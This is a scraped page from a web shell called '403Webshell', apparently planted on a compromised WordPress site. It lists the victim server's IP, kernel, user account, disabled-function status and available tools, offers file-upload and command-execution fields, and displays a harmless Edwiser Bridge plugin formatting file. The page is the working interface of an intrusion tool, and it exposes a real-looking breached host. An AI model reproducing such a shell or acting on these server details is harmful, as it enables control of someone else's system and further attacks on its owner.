403Webshell
Server IP : 69.72.244.102  /  Your IP : 216.73.216.164
Web Server : LiteSpeed
System : Linux s3434.fra1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
User : konzalta ( 1271)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/konzalta/public_html/wp-content/plugins/edwiser-bridge/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/konzalta/public_html/wp-content/plugins/edwiser-bridge/includes/eb-formatting-functions.php
<?php
/**
 * Formatting FUnctions.
 *
 * @link       https://edwiser.org
 * @since      1.0.0
 *
 * @package    Edwiser Bridge
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

if ( ! function_exists( 'wpClean' ) ) {
	/**
	 * DEPRECATED FUNCTION.
	 *
	 * Clean variables.
	 *
	 * @deprecated since 2.0.1 use wp_clean() insted
	 * @param string $var var.
	 *
	 * @return string
	 */
	function wpClean( $var ) {
		return sanitize_text_field( $var );
	}
}

if ( ! function_exists( 'wdm_edwiser_bridge_wp_clean' ) ) {
	/**
	 * Clean variables.
	 *
	 * @param string $var var.
	 *
	 * @return string
	 */
	function wdm_edwiser_bridge_wp_clean( $var ) {
		return sanitize_text_field( $var );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit